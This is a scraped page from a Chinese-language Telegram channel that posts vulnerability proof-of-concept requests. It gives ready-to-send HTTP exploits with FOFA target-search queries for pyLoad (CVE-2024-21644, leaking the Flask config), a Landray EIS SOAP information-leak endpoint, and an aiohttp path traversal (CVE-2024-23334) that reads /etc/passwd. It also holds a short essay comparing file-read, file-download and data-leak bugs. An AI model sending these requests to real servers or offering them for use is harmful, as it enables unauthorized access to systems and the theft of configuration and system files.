踹哈公寓 – Telegram
踹哈公寓
4.11K subscribers
589 photos
19 videos
307 files
357 links
Download Telegram
Pyload未授权访问漏洞(CVE-2024-21644)

app:"pyLoad"

GET /render/info.html HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15 Ddg/15.6Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip, deflate

(获取Flask配置poc)
👍3
幽默ai总结机器人
Forwarded from 
😁9🤯3
Channel photo updated
Channel name was changed to «서빙고 호텔_全斗焕offical👿»
Forwarded from 唯一的思念
🤔3
蓝凌 EIS智慧协同平台WS_getAllInfos存在信息泄露漏洞

Fofa: app="Landray-EIS智慧协同平台

POST /WS/Basic/Basic.asmx HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: ASP.NET_SessionId=u1n0cky5q5giplqhpajjrf55; FIOA_IMG_FOLDER=FIUpgrade-Insecure-Requests: 1SOAPAction: http://tempuri.org/WS_getAllInfosContent-Type: text/xml;charset=UTF-8Host: Content-Length: 214<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/"><soapenv:Header/><soapenv:Body><tem:WS_getAllInfos/></soapenv:Body></soapenv:Envelope>
1
以后频道发的poc统一用txt了
根据群友反应tg复制会打乱包体格式
错误的,由于tg居然这么兼容md语法,以后的poc内容就发这种代码块了,还支持大段内容一键复制
4
关于 文件读取 任意文件读取 敏感信息泄露以及任意文件下载漏洞的共同点和区别

文件读取和任意文件读取,顾名思义,一个是能读某个本来不应该读取的文件,一个是服务器上啥文件都能读取。原理是代码里file_get_contents(),fopen(),reafile()这种文件读取函数调用前没有验证,任意文件读取是在文件读取漏洞的基础上回溯符滥用../,可以简单的理解为文件读取是对于权限认证的bypass,是未授权访问的一种,任意文件读取是文件读取加目录遍历

文件读取和文件下载漏洞的区别,这个是浏览器响应头设置的问题。举个例子,如果他php代码写的是
header('Content-Type: application/pdf');
这就是文件读取漏洞,如果写的是
header('Content-Type: application/octet-stream');
那就是文件下载漏洞,文件内容发送到服务器输出缓冲区以stream流进行传输。从安全角度来说我感觉区别倒是不大,无非是在线观看和本地保存的区别

敏感信息泄露,有的文章说是任意文件读取的子集,有道理但是我个人觉得这个说法不一定恰当。因为有些敏感信息泄露,edusrc长期刷分的那种,某某接口泄露明文手机号身份证号的,api在后端就用类似于Apache Solr里的DataImportHandler程序处理了,再通过接口的输入验证缺陷发送给你,这个过程其实相当于他帮助你合法完成了解密数据的过程——总结来说就是,任意文件读取漏洞理论上确实能做到敏感信息泄露漏洞有的所有危害,但是任意文件读取很多时候你读的都是一堆子加密后的数据。确实,你可以说我继续读解密代码接口配置代码把密文解密出来,但是肯定没有敏感信息泄露直接泄露来得快,这也是我个人认为这俩算是两种不同漏洞的原因
3👍2
🤣3👎1
CVE-2024-23334 aiohttp 路径遍历漏洞

noscript=="ComfyUI"

GET /static/../../../../../etc/passwd HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip